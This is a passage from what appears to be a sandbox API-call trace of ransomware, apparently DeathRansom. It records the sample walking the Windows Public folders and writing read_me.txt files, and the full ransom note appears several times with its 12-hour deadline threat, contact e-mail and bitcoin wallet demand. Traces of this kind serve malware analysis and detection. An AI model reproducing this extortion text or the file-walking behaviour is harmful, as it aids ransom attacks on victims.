ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0076.108] lstrcpyW (in: lpString1=0x8e43188, lpString2="\\\\?\\C:\\Users\\Public\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop") returned="\\\\?\\C:\\Users\\Public\\Desktop" [0076.108] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 121 [0076.108] QueueUserWorkItem (Function=0x40a710, Context=0x8e43188, Flags=0x0) returned 1 [0076.108] GetProcessHeap () returned 0x280000 [0076.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e53190 [0076.109] wnsprintfW (in: pszDest=0x8e53190, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\*") returned 29 [0076.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.111] lstrcpyW (in: lpString1=0x8e53190, lpString2="\\\\?\\C:\\Users\\Public\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents") returned="\\\\?\\C:\\Users\\Public\\Documents" [0076.111] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 122 [0076.111] QueueUserWorkItem (Function=0x40a710, Context=0x8e53190, Flags=0x0) returned 1 [0076.111] GetProcessHeap () returned 0x280000 [0076.111] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e63198 [0076.112] wnsprintfW (in: pszDest=0x8e63198, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\*") returned 31 [0076.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.113] lstrcpyW (in: lpString1=0x8e731a0, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music" [0076.113] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 123 [0076.113] QueueUserWorkItem (Function=0x40a710, Context=0x8e731a0, Flags=0x0) returned 1 [0076.113] GetProcessHeap () returned 0x280000 [0076.113] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e831a8 [0076.114] wnsprintfW (in: pszDest=0x8e831a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*") returned 40 [0076.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url眕豿眵\x17ǜ(眕", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0076.114] wnsprintfW (in: pszDest=0x8e831a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\read_me.txt") returned 50 [0076.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\read_me.txt" (normalized: "c:\\users\\public\\documents\\my music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e0 [0076.160] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.160] WriteFile (in: hFile=0x7e0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.161] CloseHandle (hObject=0x7e0) returned 1 [0076.161] GetProcessHeap () returned 0x280000 [0076.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8e831a8 | out: hHeap=0x280000) returned 1 [0076.161] lstrcpyW (in: lpString1=0x8e831a8, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" [0076.161] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 124 [0076.161] QueueUserWorkItem (Function=0x40a710, Context=0x8e831a8, Flags=0x0) returned 1 [0076.161] GetProcessHeap () returned 0x280000 [0076.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e931b0 [0076.162] wnsprintfW (in: pszDest=0x8e931b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*") returned 43 [0076.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url眕豿眵\x17ǜ(眕", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0076.162] wnsprintfW (in: pszDest=0x8e931b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\read_me.txt") returned 53 [0076.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\read_me.txt" (normalized: "c:\\users\\public\\documents\\my pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e0 [0076.163] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.163] WriteFile (in: hFile=0x7e0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.164] CloseHandle (hObject=0x7e0) returned 1 [0076.164] GetProcessHeap () returned 0x280000 [0076.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8e931b0 | out: hHeap=0x280000) returned 1 [0076.164] lstrcpyW (in: lpString1=0x8e931b0, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" [0076.164] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 125 [0076.164] QueueUserWorkItem (Function=0x40a710, Context=0x8e931b0, Flags=0x0) returned 1 [0076.164] GetProcessHeap () returned 0x280000 [0076.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ea31b8 [0076.165] wnsprintfW (in: pszDest=0x8ea31b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*") returned 41 [0076.165] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url眕豿眵\x17ǜ(眕", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0076.165] wnsprintfW (in: pszDest=0x8ea31b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\read_me.txt") returned 51 [0076.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\read_me.txt" (normalized: "c:\\users\\public\\documents\\my videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e0 [0076.165] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.165] WriteFile (in: hFile=0x7e0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.166] CloseHandle (hObject=0x7e0) returned 1 [0076.166] GetProcessHeap () returned 0x280000 [0076.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ea31b8 | out: hHeap=0x280000) returned 1 [0076.167] lstrcpyW (in: lpString1=0x8e63198, lpString2="\\\\?\\C:\\Users\\Public\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads") returned="\\\\?\\C:\\Users\\Public\\Downloads" [0076.168] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 126 [0076.168] QueueUserWorkItem (Function=0x40a710, Context=0x8e63198, Flags=0x0) returned 1 [0076.168] GetProcessHeap () returned 0x280000 [0076.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ea31b8 [0076.168] wnsprintfW (in: pszDest=0x8ea31b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\*") returned 31 [0076.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.208] lstrcpyW (in: lpString1=0x8ea31b8, lpString2="\\\\?\\C:\\Users\\Public\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Public\\Favorites") returned="\\\\?\\C:\\Users\\Public\\Favorites" [0076.208] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 127 [0076.208] QueueUserWorkItem (Function=0x40a710, Context=0x8ea31b8, Flags=0x0) returned 1 [0076.208] GetProcessHeap () returned 0x280000 [0076.208] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8eb31c0 [0076.209] wnsprintfW (in: pszDest=0x8eb31c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\*") returned 31 [0076.209] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.210] lstrcpyW (in: lpString1=0x8eb31c0, lpString2="\\\\?\\C:\\Users\\Public\\Libraries" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries") returned="\\\\?\\C:\\Users\\Public\\Libraries" [0076.210] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 128 [0076.210] QueueUserWorkItem (Function=0x40a710, Context=0x8eb31c0, Flags=0x0) returned 1 [0076.210] GetProcessHeap () returned 0x280000 [0076.210] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ec31c8 [0076.211] wnsprintfW (in: pszDest=0x8ec31c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\*") returned 31 [0076.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.213] lstrcpyW (in: lpString1=0x8ec31c8, lpString2="\\\\?\\C:\\Users\\Public\\Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music") returned="\\\\?\\C:\\Users\\Public\\Music" [0076.213] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 129 [0076.213] QueueUserWorkItem (Function=0x40a710, Context=0x8ec31c8, Flags=0x0) returned 1 [0076.213] GetProcessHeap () returned 0x280000 [0076.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ed31d0 [0076.214] wnsprintfW (in: pszDest=0x8ed31d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\*") returned 27 [0076.214] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x17f94f70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x17f94f70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.214] lstrcpyW (in: lpString1=0x8ee31d8, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" [0076.215] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 130 [0076.215] QueueUserWorkItem (Function=0x40a710, Context=0x8ee31d8, Flags=0x0) returned 1 [0076.215] GetProcessHeap () returned 0x280000 [0076.215] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ef31e0 [0076.215] wnsprintfW (in: pszDest=0x8ef31e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*") returned 40 [0076.216] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0076.310] lstrcpyW (in: lpString1=0x8ed31d0, lpString2="\\\\?\\C:\\Users\\Public\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures" [0076.310] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 131 [0076.310] QueueUserWorkItem (Function=0x40a710, Context=0x8ed31d0, Flags=0x0) returned 1 [0076.310] GetProcessHeap () returned 0x280000 [0076.310] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ef31e0 [0076.310] wnsprintfW (in: pszDest=0x8ef31e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\*") returned 30 [0076.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x17f94f70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x17f94f70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.311] lstrcpyW (in: lpString1=0x8f031e8, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" [0076.311] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 132 [0076.311] QueueUserWorkItem (Function=0x40a710, Context=0x8f031e8, Flags=0x0) returned 1 [0076.311] GetProcessHeap () returned 0x280000 [0076.311] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8f131f0 [0076.312] wnsprintfW (in: pszDest=0x8f131f0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned 46 [0076.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0076.520] lstrcpyW (in: lpString1=0x8ef31e0, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV") returned="\\\\?\\C:\\Users\\Public\\Recorded TV" [0076.520] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 133 [0076.520] QueueUserWorkItem (Function=0x40a710, Context=0x8ef31e0, Flags=0x0) returned 1 [0076.521] GetProcessHeap () returned 0x280000 [0076.521] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8f131f0 [0076.521] wnsprintfW (in: pszDest=0x8f131f0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\*") returned 33 [0076.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, 